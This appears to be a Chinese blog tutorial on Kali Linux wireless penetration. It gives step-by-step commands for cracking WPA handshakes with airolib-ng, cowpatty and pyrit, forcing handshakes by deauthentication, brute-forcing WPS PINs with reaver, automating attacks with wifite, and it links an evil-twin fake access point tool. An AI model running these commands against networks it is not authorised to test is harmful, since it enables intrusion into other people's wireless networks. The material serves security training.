Airolib

设计用于存储ESSID和密码列表,计算生成不变的PMK(计算资源消耗型)

PMK在破解阶段被用于计算PTK(速度快,计算资源要求少)

通过完整性摘要值破解密码SQLite3数据库存储数据

实例:

抓包获取四步信息

echo 目标ESSID > essid.txt(创建一个ESSID文件)
airolib-ng db --import essid essid.txt(创建一个数据库db,导入一个essid,这个essid文件存在essid.txt文件里)
airolib-ng db --stats(查看数据库状态)
airolib-ng db --import passwd /usr/share/wordlists/xxx.txt(导入密码文件,它会剔除不合格的密码)
airolib-ng db --batch(生成PMK)
aircrack-ng -r db test-01.cap(通过抓取到的包对比db数据库里面的PMK破解密码)

Cowpatty破解密码

一样的,先抓包获取四步信息

cowpatty -r xx-01.cap -f password.txt -s 目标essid (-r 指定抓到包的文件,-f 使用的字典,-s 目标essid)

使用彩虹表(PMK)

genpmk -f password.txt -d pmk -s 目标essid (-f 使用的字典 -d生成的pmk文件名 -s 目标essid)

cowpatty -r xx-01.cap -d pmk -s 目标essid (-r 指定抓到包的文件,-d 指定pmk文件,-s 目标essid)

Pyrit破解密码

与airolib,cowpatty相同,支持基于预计算的pmk提高破解速度

独有的优势:

CPU外,可以运用GPU的计算能力加速生成PMK,本身支持抓包获取四步握手过程,无需airodump抓包

也支持传统的读取airodump抓包获取四步握手的方式

实例:

pyrit -r wlan0mon -o wap.cap stripLive (-r 指定抓包的网卡,-o 输出文件名 stripLive是踢出多余的信息)kali linux之无线渗透(续)-LMLPHP

然后配合aireplay-ng把目标打掉,获取四步信息 kali linux之无线渗透(续)-LMLPHP

会生成一个抓包文件kali linux之无线渗透(续)-LMLPHP

分析包(analyze)kali linux之无线渗透(续)-LMLPHP

从airodump抓包导入并筛选提取出新的包,剔除多余的信息kali linux之无线渗透(续)-LMLPHP

会生成新的包

kali linux之无线渗透(续)-LMLPHP

可以直接用密码字典破解,但是没灵魂,使用数据库模式破解

默认基于文件的数据库,支持sql数据库,将计算的PMK存入数据库

查看默认数据库状态:pyrit eval

导入密码字典:pyrit -i password.txt import_passwords(会剔除不合格的密码)

指定ESSID:pyrit -e ESSID名 create_essid (创建essid)

计算PMK:pyrit batch (发挥GPU计算能力)

破解密码:pyrit -r wap01.cap -b APmac attack_db

实例:

导入密码文件kali linux之无线渗透(续)-LMLPHP

查看可用密码文件kali linux之无线渗透(续)-LMLPHP

创建essid

kali linux之无线渗透(续)-LMLPHP

计算PMK

kali linux之无线渗透(续)-LMLPHP

破解密码

kali linux之无线渗透(续)-LMLPHP

WPS攻击

WPS是wifi联盟2006年开发的一项技术,通过pin码来简化无线接入的操作,无需记住PSK,路由器和网卡名各按一个按钮就能接入无线.pin码是分为前后各4位的2段共8位数字

2011年被发现安全漏洞,接入发起方可以根据路由器的返回信息判断前4位是否正确,而pin码的后四位只有1000种定义的组合(最后一位是checksum),所以全部穷举破解只需要11000次尝试,(PSK 218,340,105,584,896),标准本身没有设定锁定机制,目前多个厂商已实现锁定机制

wash -i wlan0mon (发现支持wps的无线)

kali linux之无线渗透(续)-LMLPHP

airodump-ng wlan0mon --wps (也可以加上--wps参数)

kali linux之无线渗透(续)-LMLPHP

爆破PIN码

reaver -i wlan0mon -b APmac -vvkali linux之无线渗透(续)-LMLPHP

爆破出pin码后

reaver -i wlan0mon -b APmac -vv -p PIN码

综合自动化无线密码破解工具:wifite

kali linux之无线渗透(续)-LMLPHP

ctrl+c停止扫描,选择目标

kali linux之无线渗透(续)-LMLPHP

它会自动逐个尝试,WPS,握手包等等

kali linux之无线渗透(续)-LMLPHP

伪造AP:3vilTwinAttacker  https://github.com/wi-fi-analyzer/3vilTwinAttacker.git

kali linux之无线渗透(续)-LMLPHP

kali linux之无线渗透(续)-LMLPHP

友情链接  http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

05-11 15:24